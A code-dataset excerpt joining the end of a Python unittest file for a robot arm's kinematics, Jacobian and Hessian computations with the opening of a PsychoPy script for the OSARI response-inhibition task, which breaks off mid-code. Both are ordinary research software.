# ans = '[tz(0.333), Rz(q0), Rx(-90), Rz(q1), Rx(90), tz(0.316), '\
# 'Rz(q2), tx(0.0825), Rx(90), Rz(q3), tx(-0.0825), Rx(-90), '\
# 'tz(0.384), Rz(q4), Rx(90), Rz(q5), tx(0.088), Rx(90), '\
# 'tz(0.107), Rz(q6)]'
# self.assertEqual(str(panda.ets), ans)
def test_fkine(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
ans = np.array([
[-0.50827907, -0.57904589, 0.63746234, 0.44682295],
[0.83014553, -0.52639462, 0.18375824, 0.16168396],
[0.22915229, 0.62258699, 0.74824773, 0.96798113],
[0., 0., 0., 1.]
])
panda.q = q1
nt.assert_array_almost_equal(panda.fkine().A, ans)
nt.assert_array_almost_equal(panda.fkine(q2).A, ans)
nt.assert_array_almost_equal(panda.fkine(q3).A, ans)
nt.assert_array_almost_equal(panda.fkine(q3).A, ans)
self.assertRaises(TypeError, panda.fkine, 'Wfgsrth')
def test_fkine_traj(self):
panda = rp.Panda()
q = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
qq = np.c_[q, q, q, q]
ans = np.array([
[-0.50827907, -0.57904589, 0.63746234, 0.44682295],
[0.83014553, -0.52639462, 0.18375824, 0.16168396],
[0.22915229, 0.62258699, 0.74824773, 0.96798113],
[0., 0., 0., 1.]
])
TT = panda.fkine(qq)
nt.assert_array_almost_equal(TT[0].A, ans)
nt.assert_array_almost_equal(TT[1].A, ans)
nt.assert_array_almost_equal(TT[2].A, ans)
nt.assert_array_almost_equal(TT[3].A, ans)
def test_allfkine(self):
pm = rp.PandaMDH()
p = rp.Panda()
q = [1, 2, 3, 4, 5, 6, 7]
p.q = q
pm.q = q
p.allfkine()
r2 = pm.allfkine()
for i in range(7):
nt.assert_array_almost_equal(p.ets[i]._fk.A, r2[i].A)
p.allfkine(q)
for i in range(7):
nt.assert_array_almost_equal(p.ets[i]._fk.A, r2[i].A)
def test_jacob0(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[-1.61683957e-01, 1.07925929e-01, -3.41453006e-02,
3.35029257e-01, -1.07195463e-02, 1.03187865e-01,
0.00000000e+00],
[4.46822947e-01, 6.25741987e-01, 4.16474664e-01,
-8.04745724e-02, 7.78257566e-02, -1.17720983e-02,
0.00000000e+00],
[0.00000000e+00, -2.35276631e-01, -8.20187641e-02,
-5.14076923e-01, -9.98040745e-03, -2.02626953e-01,
0.00000000e+00],
[1.29458954e-16, -9.85449730e-01, 3.37672585e-02,
-6.16735653e-02, 6.68449878e-01, -1.35361558e-01,
6.37462344e-01],
[9.07021273e-18, 1.69967143e-01, 1.95778638e-01,
9.79165111e-01, 1.84470262e-01, 9.82748279e-01,
1.83758244e-01],
[1.00000000e+00, -2.26036604e-17, 9.80066578e-01,
-1.93473657e-01, 7.20517510e-01, -1.26028049e-01,
7.48247732e-01]
])
panda.q = q1
nt.assert_array_almost_equal(panda.jacob0(), ans)
nt.assert_array_almost_equal(panda.jacob0(q2), ans)
nt.assert_array_almost_equal(panda.jacob0(q3), ans)
nt.assert_array_almost_equal(panda.jacob0(q4), ans)
self.assertRaises(TypeError, panda.jacob0, 'Wfgsrth')
def test_hessian0(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[
[-4.46822947e-01, -6.25741987e-01, -4.16474664e-01,
8.04745724e-02, -7.78257566e-02, 1.17720983e-02,
0.00000000e+00],
[-6.25741987e-01, -3.99892968e-02, -1.39404950e-02,
-8.73761859e-02, -1.69634134e-03, -3.44399243e-02,
0.00000000e+00],
[-4.16474664e-01, -1.39404950e-02, -4.24230421e-01,
-2.17748413e-02, -7.82283735e-02, -2.81325889e-02,
0.00000000e+00],
[8.04745724e-02, -8.73761859e-02, -2.17748413e-02,
-5.18935898e-01, 5.28476698e-03, -2.00682834e-01,
0.00000000e+00],
[-7.78257566e-02, -1.69634134e-03, -7.82283735e-02,
5.28476698e-03, -5.79159088e-02, -2.88966443e-02,
0.00000000e+00],
[1.17720983e-02, -3.44399243e-02, -2.81325889e-02,
-2.00682834e-01, -2.88966443e-02, -2.00614904e-01,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[-1.61683957e-01, 1.07925929e-01, -3.41453006e-02,
3.35029257e-01, -1.07195463e-02, 1.03187865e-01,
0.00000000e+00],
[1.07925929e-01, -2.31853293e-01, -8.08253690e-02,
-5.06596965e-01, -9.83518983e-03, -1.99678676e-01,
0.00000000e+00],
[-3.41453006e-02, -8.08253690e-02, -3.06951191e-02,
3.45709946e-01, -1.01688580e-02, 1.07973135e-01,
0.00000000e+00],
[3.35029257e-01, -5.06596965e-01, 3.45709946e-01,
-9.65242924e-02, 1.45842251e-03, -3.24608603e-02,
0.00000000e+00],
[-1.07195463e-02, -9.83518983e-03, -1.01688580e-02,
1.45842251e-03, -1.05221866e-03, 2.09794626e-01,
0.00000000e+00],
[1.03187865e-01, -1.99678676e-01, 1.07973135e-01,
-3.24608603e-02, 2.09794626e-01, -4.04324654e-02,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00],
[0.00000000e+00, -6.34981134e-01, -4.04611266e-01,
2.23596800e-02, -7.48714002e-02, -5.93773551e-03,
0.00000000e+00],
[0.00000000e+00, -4.04611266e-01, 2.07481281e-02,
-6.83089775e-02, 4.72662062e-03, -2.05994912e-02,
0.00000000e+00],
[0.00000000e+00, 2.23596800e-02, -6.83089775e-02,
-3.23085806e-01, 5.69641385e-03, -1.00311930e-01,
0.00000000e+00],
[0.00000000e+00, -7.48714002e-02, 4.72662062e-03,
5.69641385e-03, 5.40000550e-02, -2.69041502e-02,
0.00000000e+00],
[0.00000000e+00, -5.93773551e-03, -2.05994912e-02,
-1.00311930e-01, -2.69041502e-02, -9.98142073e-02,
0.00000000e+00],
[0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00, 0.00000000e+00, 0.00000000e+00,
0.00000000e+00]
],
[
[-9.07021273e-18, -2.77555756e-17, -2.77555756e-17,
-1.11022302e-16, -2.77555756e-17, 0.00000000e+00,
-2.77555756e-17],
[-1.69967143e-01, -1.97756387e-17, 4.11786040e-17,
-1.48932398e-16, -5.07612940e-17, -8.38219650e-17,
-4.90138154e-17],
[-1.95778638e-01, 1.66579116e-01, -1.38777878e-17,
1.04083409e-17, -1.38777878e-17, 3.46944695e-18,
0.00000000e+00],
[-9.79165111e-01, -3.28841647e-02, -9.97525009e-01,
-4.16333634e-17, -1.14491749e-16, 1.38777878e-17,
-6.24500451e-17],
[-1.84470262e-01, 1.22464303e-01, -3.97312016e-02,
7.41195745e-01, -2.77555756e-17, 1.12757026e-16,
2.77555756e-17],
[-9.82748279e-01, -2.14206274e-02, -9.87832342e-01,
6.67336352e-02, -7.31335770e-01, 2.08166817e-17,
-6.07153217e-17],
[-1.83758244e-01, 1.27177529e-01, -3.36043908e-02,
7.68210453e-01, 5.62842325e-03, 7.58497864e-01,
0.00000000e+00]
],
[
[1.29458954e-16, -1.11022302e-16, 8.67361738e-17,
-4.16333634e-17, 5.55111512e-17, 2.77555756e-17,
5.55111512e-17],
[-9.85449730e-01, -6.36381327e-17, -1.02735399e-16,
-1.83043043e-17, -5.63484308e-17, 8.08886307e-18,
1.07112702e-18],
[3.37672585e-02, 9.65806345e-01, 8.32667268e-17,
-2.55871713e-17, 1.07552856e-16, 2.08166817e-17,
-5.20417043e-18],
[-6.16735653e-02, -1.90658563e-01, -5.39111251e-02,
-6.59194921e-17, -2.77555756e-17, 2.38524478e-17,
-4.16333634e-17],
[6.68449878e-01, 7.10033786e-01, 6.30795483e-01,
-8.48905588e-02, 0.00000000e+00, 3.46944695e-17,
2.77555756e-17],
[-1.35361558e-01, -1.24194307e-01, -1.28407717e-01,
1.84162966e-02, -1.32869389e-02, 2.77555756e-17,
-2.08166817e-17],
[6.37462344e-01, 7.37360525e-01, 5.99489263e-01,
-7.71850655e-02, -4.08633244e-02, 2.09458434e-02,
0.00000000e+00]
],
[
[0.00000000e+00, -6.59521910e-17, -1.31033786e-16,
-1.92457571e-16, 1.54134782e-17, -7.69804929e-17,
1.11140361e-17],
[0.00000000e+00, -2.77555756e-17, 7.15573434e-17,
1.65666092e-16, 1.38777878e-17, -8.67361738e-18,
3.46944695e-17],
[0.00000000e+00, -1.98669331e-01, 8.67361738e-18,
-1.46584134e-16, 6.02816408e-17, -3.12250226e-17,
6.11490025e-17],
[0.00000000e+00, -9.54435515e-01, 4.51380881e-02,
1.38777878e-17, 1.08420217e-16, 3.46944695e-18,
6.24500451e-17],
[0.00000000e+00, -2.95400686e-01, -1.24639152e-01,
-6.65899738e-01, -4.85722573e-17, -5.20417043e-18,
-5.55111512e-17],
[0.00000000e+00, -9.45442009e-01, 5.96856167e-02,
7.19317248e-02, 6.81888149e-01, -2.77555756e-17,
1.04083409e-17],
[0.00000000e+00, -2.89432165e-01, -1.18596498e-01,
-6.35513913e-01, 5.24032975e-03, -6.51338823e-01,
0.00000000e+00]
]
])
panda.q = q1
nt.assert_array_almost_equal(panda.hessian0(), ans)
nt.assert_array_almost_equal(panda.hessian0(q2), ans)
nt.assert_array_almost_equal(panda.hessian0(q3), ans)
nt.assert_array_almost_equal(panda.hessian0(q4), ans)
nt.assert_array_almost_equal(panda.hessian0(J0=panda.jacob0(q1)), ans)
nt.assert_array_almost_equal(panda.hessian0(
q1, J0=panda.jacob0(q1)), ans)
# self.assertRaises(ValueError, panda.hessian0)
self.assertRaises(ValueError, panda.hessian0, [1, 3])
self.assertRaises(TypeError, panda.hessian0, 'Wfgsrth')
self.assertRaises(
ValueError, panda.hessian0, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.hessian0, [1, 3], 'qwe')
def test_manipulability(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = 0.006559178039088341
panda.q = q1
nt.assert_array_almost_equal(panda.manipulability(), ans)
nt.assert_array_almost_equal(panda.manipulability(q2), ans)
nt.assert_array_almost_equal(panda.manipulability(q3), ans)
nt.assert_array_almost_equal(panda.manipulability(q4), ans)
# self.assertRaises(ValueError, panda.manipulability)
self.assertRaises(TypeError, panda.manipulability, 'Wfgsrth')
self.assertRaises(
ValueError, panda.manipulability, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.manipulability, [1, 3], 'qwe')
def test_jacobm(self):
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
q2 = [1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9]
q3 = np.expand_dims(q1, 0)
q4 = np.expand_dims(q1, 1)
ans = np.array([
[1.27080875e-17],
[2.38242538e-02],
[6.61029519e-03],
[8.18202121e-03],
[7.74546204e-04],
[-1.10885380e-02],
[0.00000000e+00]
])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobm(), ans)
nt.assert_array_almost_equal(panda.jacobm(q2), ans)
nt.assert_array_almost_equal(panda.jacobm(q3), ans)
nt.assert_array_almost_equal(panda.jacobm(q4), ans)
nt.assert_array_almost_equal(panda.jacobm(J=panda.jacob0(q1)), ans)
# self.assertRaises(ValueError, panda.jacobm)
self.assertRaises(TypeError, panda.jacobm, 'Wfgsrth')
self.assertRaises(ValueError, panda.jacobm, [1, 3], np.array([1, 5]))
self.assertRaises(TypeError, panda.jacobm, [1, 3], 'qwe')
self.assertRaises(
TypeError, panda.jacobm, [1, 3], panda.jacob0(q1), [1, 2, 3])
self.assertRaises(
ValueError, panda.jacobm, [1, 3], panda.jacob0(q1),
np.array([1, 2, 3]))
def test_jacobev(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobev(), pdh.jacobev(q1))
def test_jacob0v(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacob0v(), pdh.jacob0v(q1))
def test_jacobe(self):
pdh = rp.PandaMDH()
panda = rp.Panda()
q1 = np.array([1.4, 0.2, 1.8, 0.7, 0.1, 3.1, 2.9])
panda.q = q1
nt.assert_array_almost_equal(panda.jacobe(), pdh.jacobe(q1))
nt.assert_array_almost_equal(panda.jacobe(q1), pdh.jacobe(q1))
def test_init(self):
l0 = rp.ELink()
l1 = rp.ELink()
r = rp.ETS([l0, l1], base=sm.SE3.Rx(1.3), base_link=l1, ee_link=l0)
r.base_link = l1
r.base_link = 0
r.ee_link = 1
with self.assertRaises(TypeError):
rp.ETS(l0, base=sm.SE3.Rx(1.3))
with self.assertRaises(TypeError):
rp.ETS([1, 2], base=sm.SE3.Rx(1.3))
def test_dict(self):
panda = rp.PandaURDF()
panda.to_dict()
wx = rp.wx250s()
wx.to_dict()
def test_fkdict(self):
panda = rp.PandaURDF()
fkd = panda.fk_dict()
for i in range(len(panda.ets)):
nt.assert_array_almost_equal(
panda.ets[i]._fk.t,
fkd['links'][i]['t'])
def test_qlim(self):
panda = rp.PandaURDF()
self.assertEqual(panda.qlim.shape[0], 2)
self.assertEqual(panda.qlim.shape[1], panda.n)
def test_manuf(self):
panda = rp.PandaURDF()
self.assertIsInstance(panda.manuf, str)
def test_complex(self):
l0 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRx()])
l1 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRy()], parent=l0)
l2 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.TRz()], parent=l1)
l3 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Ttx()], parent=l2)
l4 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Tty()], parent=l3)
l5 = rp.ELink([rp.ET.Ttx(0.1), rp.ET.Ttz()], parent=l4)
r = rp.ETS([l0, l1, l2, l3, l4, l5])
r.q = [1, 2, 3, 1, 2, 3]
ans = np.array([
[-0., 0.08752679, -0.74761985, 0.41198225, 0.05872664, 0.90929743],
[1.46443609, 2.80993063, 0.52675075, -0.68124272, -0.64287284,
0.35017549],
[-1.04432, -1.80423571, -2.20308833, 0.60512725, -0.76371834,
-0.2248451],
[1., 0., 0.90929743, 0., 0., 0.],
[0., 0.54030231, 0.35017549, 0., 0., 0.],
[0., 0.84147098, -0.2248451, 0., 0., 0.]
])
nt.assert_array_almost_equal(r.jacob0(), ans)
# def test_plot(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False)
# e.close()
# def test_plot_complex(self):
# l0 = rp.ET.TRz()
# l1 = rp.ET.Ttx()
# l2 = rp.ET.TRy()
# l3 = rp.ET.Ttz(1)
# l4 = rp.ET.TRx()
# E = rp.ETS([l0, l1, l2, l3, l4])
# e = E.plot(block=False)
# e.step(0)
# e.close()
# def test_teach(self):
# l0 = rp.ET.TRz()
# l1 = rp.ET.Ttx()
# l2 = rp.ET.TRy()
# l3 = rp.ET.Ttz(1)
# l4 = rp.ET.TRx()
# E = rp.ETS([l0, l1, l2, l3, l4])
# e = E.teach(block=False, q=[1, 2, 3, 4])
# e.close()
# def test_plot_traj(self):
# panda = rp.Panda()
# q = np.random.rand(7, 3)
# e = panda.plot(block=False, q=q, dt=0)
# e.close()
def test_control_type2(self):
panda = rp.Panda()
panda.control_type = 'p'
with self.assertRaises(ValueError):
panda.control_type = 'z'
# def test_plot_vellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot_vellipse(block=False, limits=[1, 2, 1, 2, 1, 2])
# e.close()
# e = panda.plot_vellipse(
# block=False, q=panda.qr, centre='ee', opt='rot')
# e.step(0)
# e.close()
# with self.assertRaises(TypeError):
# panda.plot_vellipse(vellipse=10)
# with self.assertRaises(ValueError):
# panda.plot_vellipse(centre='ff')
# def test_plot_fellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot_fellipse(block=False, limits=[1, 2, 1, 2, 1, 2])
# e.close()
# e = panda.plot_fellipse(
# block=False, q=panda.qr, centre='ee', opt='rot')
# e.step(0)
# e.close()
# with self.assertRaises(TypeError):
# panda.plot_fellipse(fellipse=10)
# with self.assertRaises(ValueError):
# panda.plot_fellipse(centre='ff')
# def test_plot_with_vellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False, vellipse=True)
# e.close()
# def test_plot_with_fellipse(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot(block=False, fellipse=True)
# e.close()
# def test_plot2(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.plot2(block=False, name=True)
# e.close()
# def test_plot2_traj(self):
# panda = rp.Panda()
# q = np.random.rand(7, 3)
# e = panda.plot2(block=False, q=q, dt=0)
# e.close()
# def test_teach2(self):
# panda = rp.Panda()
# panda.q = panda.qr
# e = panda.teach(block=False)
# e.close()
# e2 = panda.teach2(block=False, q=panda.qr)
# e2.close()
if __name__ == '__main__':
unittest.main()
|
[
"[email protected]"
] | |
a29353f3b6c573e8101559c8fa7f56856e8ef1e3
|
6e04394dec05a3b838defdd11157705ae15912c8
|
/OSARI_time_v1.8.py
|
d6642c6444bd1797ea03370529aa2be08474c3ae
|
[] |
no_license
|
RebeccaHirst/OSARI
|
ae0f68761a43722324bef297cbecc11c1b69a12e
|
18129873133b79b19521630fb683aeba37ce523d
|
refs/heads/master
| 2021-07-20T01:38:41.372828 | 2020-07-24T07:56:42 | 2020-07-24T07:56:42 | 246,411,541 | 0 | 1 | null | null | null | null |
UTF-8
|
Python
| false | false | 37,589 |
py
|
"""
Open-Source Anticipated Response Inhibition (OSARI)
Created in PsychoPy v3.1.2
Written by: Rebecca J Hirst [1] Rohan Puri [2]
Edited by: Jason L He [3]
[1] Trinity College Institute of Neuroscience, Trinity College Dublin
[2] University of Tasmania
[3] John Hopkins School of Medicine
Mail to Author: rj.hirst at hotmail.co.uk
Version 1.3;
Create Date 04062019;
Last edited 190720
References:
Guthrie, M. D., Gilbert, D. L., Huddleston, D. A., Pedapati, E. V., Horn, P. S., Mostofsky, S. H., & Wu, S. W. (2018).
Online Transcranial Magnetic Stimulation Protocol for Measuring Cortical Physiology Associated with Response Inhibition.
Journal of Visualized Experiments, (132), 1-7. http://doi.org/10.3791/56789
He, J. L., Fuelscher, I., Coxon, J., Barhoun, P., Parmar, D., Enticott, P. G., & Hyde, C. (2018).
Impaired motor inhibition in developmental coordination disorder. Brain and Cognition, 127(August),
23-33. http://doi.org/10.1016/j.bandc.2018.09.002
Input:
3 csv files:
practiceGoConditions.csv
practiceMixedConditions.csv
TestConditions.csv
In all csv files each row corresponds to a trial, so number of rows will correspond to the number of trials in a block.
0 = Go 1 = Stop
Output:
4 output files in format:
OSARI_ExpH_123_OSARI_2020_Jul_19_1307.log
OSARI_ExpH_123_OSARI_2020_Jul_19_1307.csv
OSARI_ExpH_123_OSARI_2020_Jul_19_1307.psydat
OSARI_ExpH_123_OSARI_2020_Jul_19_1307.txt
For details on psydat and log files see
https://www.psychopy.org/general/dataOutputs.html#:~:text=PsychoPy%20data%20file%20(.-,psydat),python%20and%2C%20probably%2C%20matplotlib.
Data is contained in the .txt and .csv files. The .txt file saves the main details of interest but csv stores further details.
Block: block number
TrialType: Practice or real trial
Trial: Trial number_text
Signal: 0 = Go
1 = Stop
Response: What the participants response was ( 0 = no lift, 1 = lift)
RT: Lift time of participants relative to the starting line (to 2 decimal places)
SSD: Stop Signal Distance (relative to starting line) if the trial was a stop trial.
Note:
Make sure the resolution of "testMonitor" in monitor centre matches actual screen resolution
"""
# --------------------------------------------------------------
# Import modules
# --------------------------------------------------------------
from __future__ import absolute_import, division
from psychopy import gui, visual, core, data, event, logging
import numpy as np # whole numpy lib is available, prepend 'np.'
import os # handy system and path functions
import sys # to get file system encoding
import pyglet
import math
from psychopy.hardware import keyboard
_thisDir = os.path.dirname(os.path.abspath(__file__))
os.chdir(_thisDir)
# set the keyboard
kb = keyboard.Keyboard(bufferSize=10, waitForStart=True)
# --------------------------------------------------------------
# Task parameters
# This section presents users with options to collect participant data
# and set task parameters using a set of Graphic User Interfaces (GUI).
# --------------------------------------------------------------
# Participant information
expInfo={'Participant ID':0000,
'Age (Years)':00,
'Sex':['F', 'M', 'Prefer not to say'],
'Default parameters?':True}
expName='OSARI'
dlg=gui.DlgFromDict(dictionary=expInfo, title='Participant Information',
tip={'Default parameters?':
'This will run the task with no additional options'})
if dlg.OK ==False: core.quit()
expInfo['date'] = data.getDateStr()
# Task Information
# Here we have two dictionaries, "taskInfo_brief" contains parameters that can be set by the user if they do not
# want the default parameters - if the user wants to set parameters beyond this see "taskInfo" and set in the code.
taskInfo_brief={'Practice trials': True,
'Count down':True,
'Trial by trial feedback':True,
'Method':['staircase', 'fixed'],
'Trial order':['random', 'sequential'],
'Step size (s)':0.025,
'Lowest SSD (s)':0.05,
'Highest SSD (s)': 0.775,
'Total bar height (in cm)':15,
'Number of Test Blocks': 3,
'Spaceship':False,
'Full Screen':True}
#Check if user ticked for use of default parameters. If not present in depth task parameter options.
if not expInfo['Default parameters?']:
dlg=gui.DlgFromDict(dictionary=taskInfo_brief, title='Experiment Parameters',
tip={
'Count down':'Do you want a countdown before the bar starts filling?',
'Trial by trial feedback':'Do you want participants to receive trial to trial feedback',
'Method':'What SSD method do you want?',
'Trial order':'Do you want trials to be in a random order or in the order you have set in the conditions .csv file [sequential]',
'Step size (s)':'What do you want the step size to be in ms - e.g., 0.025 is 25ms',
'Lowest SSD (s)':'The lowest the SSD can go in ms - e.g., 0.05 is 5ms',
'Highest SSD (s)':'The highest the SSD can go in ms - e.g., 0.775 is 775ms',
'Total bar height (in cm)':'The total height of the bar',
'Number of Test Blocks':'Number of test blocks [i.e. number of times trials in .csv file will be repeated. to set trial number and proportion of stop vs. go adapt the .csv file]',
'Spaceship':'Do you want to run this with a moving target image (i.e. a spaceship) ?',
'Full Screen':'Do you want to run the task with Full Screen - recommended'})
if dlg.OK ==False: core.quit()
else:
#parameters with multiple options need their default selecting
taskInfo_brief['Trial order']='random'
taskInfo_brief['Method']='staircase'
# "Bar_top" is how many cm above the centre of the screen (x = 0 y = 0) the top of the bar will be drawn.
Bar_top=taskInfo_brief['Total bar height (in cm)']/2
# "Target_pos" is where the target line will be drawn. This is currently hard coded as 80%
# of the total bar length (i.e. total bar height is multiplied by .8)
Target_pos=(.8*taskInfo_brief['Total bar height (in cm)'])-Bar_top
# Additional parameters beyond "taskInfo_brief" can be set here (but not in GUI)
taskInfo={'Bar base below fixation (cm)':Bar_top,
'Bar width (cm)':3,
'Bar top above fixation (cm)':Bar_top,
'Target line width (cm)':5,
'Target line above fixation (cm)':Target_pos,
'rise velocity (cm/sec)':15,
'StopS start pos. (ms)':500,
'trial length (max trial duration in seconds)':1,
'StopS start pos. (seconds)':.5}
# "trial_length" is the max duration of a trial in seconds i.e. the amount of time it
# takes the filling bar to fill to the top.
trial_length=taskInfo['trial length (max trial duration in seconds)']
bar_height = taskInfo_brief['Total bar height (in cm)']
#The time taken to get to the target line i.e. 80% of the total trial time
Target_time=(.8*taskInfo['trial length (max trial duration in seconds)'])
# --------------------------------------------------------------
# Hardware parameters
# This section presents users with options for hardware
# parameters. For example if they want to send triggers etc.,
#
# --------------------------------------------------------------
#Set up the window in which we will present stimuli
win = visual.Window(
fullscr=taskInfo_brief['Full Screen'],
winType='pyglet',
monitor='testMonitor',
color=[-1,-1,-1],
colorSpace='rgb',
blendMode='avg',
mouseVisible = False,
allowGUI=False,
size=(1440, 900))
# --------------------------------------------------------------
# Data output parameters
# This section specifies the details of where the data will be
# saved, including filenames ect. Two folders are created "data"
# contains all task related data and "logfiles" which contain
# additional details on the task parameters and techy details
# such as if any frames were dropped.
#
# --------------------------------------------------------------
#Check if a "data" folder exists in this directory, and make one if not.
if not os.path.exists(_thisDir + os.sep +'data/'):
print('Data folder did not exist, making one in current directory')
os.makedirs(_thisDir + os.sep +'data/')
#Create the name of the output file. "Output" is the output file.
Output = _thisDir + os.sep + u'data/OSARI_%s_%s_%s' % (expInfo['Participant ID'],
expName, expInfo['date'])
with open(Output+'.txt', 'a') as b:
b.write('block trialType trial signal response ssd rt\n')
#Check if a "logfiles" folder exists in this directory, and make one if not.
if not os.path.exists(_thisDir + os.sep +'logfiles/'):
print('Logfile folder did not exist, making one in current directory')
os.makedirs(_thisDir + os.sep +'logfiles/')
# Measure the monitors refresh rate
expInfo['frameRate'] = win.getActualFrameRate()
frame_dur=1000/expInfo['frameRate'] #"frame_dur" = the duration of a single frame
#print out useful info on frame rate for the interested user
print('Monitor frame rate is %s' %(expInfo['frameRate']))
stoptime=taskInfo['StopS start pos. (seconds)']
stepsize = taskInfo_brief['Step size (s)']
upper_ssd = taskInfo_brief['Highest SSD (s)']
lower_ssd = taskInfo_brief['Lowest SSD (s)']
#Use experiment handler with 2 loops, a practice loop and a main trial loop
Output_ExpH = _thisDir + os.sep + u'data/s_%s_%s_%s' % (expInfo['Participant ID'],
expName, expInfo['date'])
thisExp = data.ExperimentHandler(
name = 'OSARI', version = '1.73',
extraInfo = taskInfo_brief, #this will save all of the user input for task info brief - might want also the full task info
savePickle=True, saveWideText=True,
dataFileName = Output_ExpH, autoLog = True)
# save a log file for detail verbose info
logFile = logging.LogFile(Output_ExpH+'.log', level=logging.DEBUG)
logging.console.setLevel(logging.WARNING) # this outputs to the screen, not a file
#Input files that are used to create the trial list at the start of each block
conditions = data.importConditions('TestConditions.csv') #conditions file for the 'main trials'
practiceGoConditions = data.importConditions('practiceGoConditions.csv') #conditions file for the 'practice go trials'
practiceMixedConditions = data.importConditions('practiceMixedConditions.csv') #conditions file for the 'practice go and stop trials'
if taskInfo_brief['Practice trials']:
prac_block_n=2 # number of practice blocks hard coded assuming we will always have 1 go block and 1 mixed block
n_blocks = taskInfo_brief['Number of Test Blocks']+prac_block_n
else:
prac_block_n=0
n_blocks = taskInfo_brief['Number of Test Blocks']
#An "outerLoop" that corresponds to blocks, we use this loop to repeat sets of trials however many times we want
outerLoop = data.TrialHandler(trialList=[], nReps=n_blocks, name = 'Block')#note: nReps also includes our 2 practice blocks
#We start out experiment with the outerLoop
thisExp.addLoop(outerLoop)
# --------------------------------------------------------------
# Keyboard parameters
# This section specifies the details of how we will check for
# key presses and key lifts.
# Note:
#Known issues with using iohub on Mac with security settings
#Bypass method noted on discourse page at:
#https://discourse.psychopy.org/t/tracking-key-release/1099
#
# --------------------------------------------------------------
key=pyglet.window.key
keyboard = key.KeyStateHandler()
win.winHandle.push_handlers(keyboard)
# --------------------------------------------------------------
# Stimulus parameters
#
# --------------------------------------------------------------
# ----------------- Instructions--------------------------------
# --------------------------------------------------------------
#practice trial text
understand=visual.TextStim(win, pos=[0, 0], height=1, color= [1,1,1],
text="Do you understand the task? (Y/N)", units='cm' )
practice_go_inst=visual.TextStim(win, pos=[0, 0], height=1, color= [1,1,1],
text="Lets start with some Go trials.\n Press any button to begin!", units='cm' )
practice_stop_inst=visual.TextStim(win, pos=[0, 0], height=1, color= [1,1,1],
text="Great! Next, lets do some Go and Stop trials!\n Press any button to begin!", units='cm' )
# Instructions
instr_image=visual.ImageStim(win, image='Stimuli'+os.sep+'instr_image.png', units='cm')
instr_image_SS=visual.ImageStim(win, image='Stimuli'+os.sep+'instr_image_SS.png', units='cm')
Main_instructions = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
text="To begin a trial, press and hold the space key\n\nOn 'Go trials': release the space key at the target\n\nOn 'Stop trials': keep the space key pressed\n\n[press any key to continue]", units="cm")
if taskInfo_brief['Spaceship']:
Main_instructions = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
text="Help the alien land his ship!\n\nPress and hold the space key untill the yellow on the UFO line reaches the target \n\nIf the UFO stops rising keep holding the space key!\n\n[press any key to continue]", units='cm')
practice_prepare = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
text="First lets practice!", units='cm')
PressKey_instructions = visual.TextStim(win, pos=[0, 0], height=1, color=[1,1,1],
text="Press and hold the space key when you are ready!", units='cm')
TooSoon_text = visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
text="Oops! You lifted too soon!\nPress space to restart countdown" , units='cm')
incorrectstop = visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
text="Oops! You held the \nbutton for too long" , units='cm')
incorrectgo = visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
text="Oops! That was a Stop trial \nYou did not withold your response" , units='cm')
correctstop=visual.TextStim(win, pos=[-8, 0], height=1, color=[1,1,1],
